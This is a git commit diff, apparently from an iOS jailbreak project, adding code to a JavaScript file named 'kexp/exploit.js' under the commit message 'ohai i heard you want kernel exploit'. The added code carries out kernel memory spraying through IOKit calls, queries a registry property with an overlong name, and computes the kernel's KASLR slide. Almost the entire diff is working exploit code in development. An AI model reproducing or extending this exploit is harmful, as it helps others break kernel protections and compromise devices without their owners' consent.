diff options
| author | spv420 <unomilliono@gmail.com> | 2022-04-24 14:02:35 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-24 14:02:35 -0400 |
| commit | 3b49965546a678f46085e961f729b179c7542f89 (patch) | |
| tree | b205984efc8ec46b6054f90395e8cf5d58f54bc3 /src/js/kexp/exploit.js | |
| parent | 0b212a73e235c233b4addd0c9ea6b55676416d17 (diff) | |
ohai i heard you want kernel exploit
Diffstat (limited to 'src/js/kexp/exploit.js')
| -rw-r--r-- | src/js/kexp/exploit.js | 28 |
1 files changed, 27 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index a78bdca..5296e6e 100644 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -20,6 +20,8 @@ var KERN_SUCCESS = 0; var NULL = 0; var MACH_PORT_NULL = 0; +var fakeportData = 0; + var kOSSerializeDictionary = 0x01000000; var kOSSerializeArray = 0x02000000; var kOSSerializeSet = 0x03000000; @@ -73,6 +75,7 @@ function spray_data(mem, size, num, portptr) { printf("%x %x\n", master, read_u32(master)); printf("%x\n", read_u32(0x36ebf00c + get_dyld_shc_slide())); ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, __cnt * 4, MACH_PORT_NULL, NULL, 0, err, portptr); + printf("still alive?\n"); if (ret == KERN_SUCCESS) { ret = read_u32(err); } @@ -86,10 +89,11 @@ function copyinPort(kport, cnt) { var self = mach_task_self(); var service = MACH_PORT_NULL; var client = malloc(4); - var it = MACH_PORT_NULL; + var it = malloc(4); var o = MACH_PORT_NULL; var data = malloc(4); var master = malloc(4); + fakeportData = malloc(4); host_get_io_master(mach_host_self(), master); ret = spray_data(NULL, 0, 5, data); printf("spray_data=%d (%s)\n", ret, mach_error_string(ret)); @@ -112,6 +116,28 @@ function copyinPort(kport, cnt) { ret = read_u32(err); } printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret)); + IORegistryEntryGetChildIterator(service, "IOService", it); + + var found = false; + + while ((o = IOIteratorNext(read_u32(it))) != MACH_PORT_NULL && !found) { + var buf = malloc(16 * 4); + var size = malloc(4); + write_u32(size, 16 * 4); + ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size); + if (ret == KERN_SUCCESS) { + printf("yolo\n"); +// mach_port_deallocate(self, read_u32(data)); +// write_u32(data, MACH_PORT_NULL); + spray_data(tst, strlen(tst) + 1, 10, fakeportData); + var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0; + printf("still alive? %x\n", 420); + printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16)); + sleep(1); + found = true; + } + } + } function get_kernel_task() { |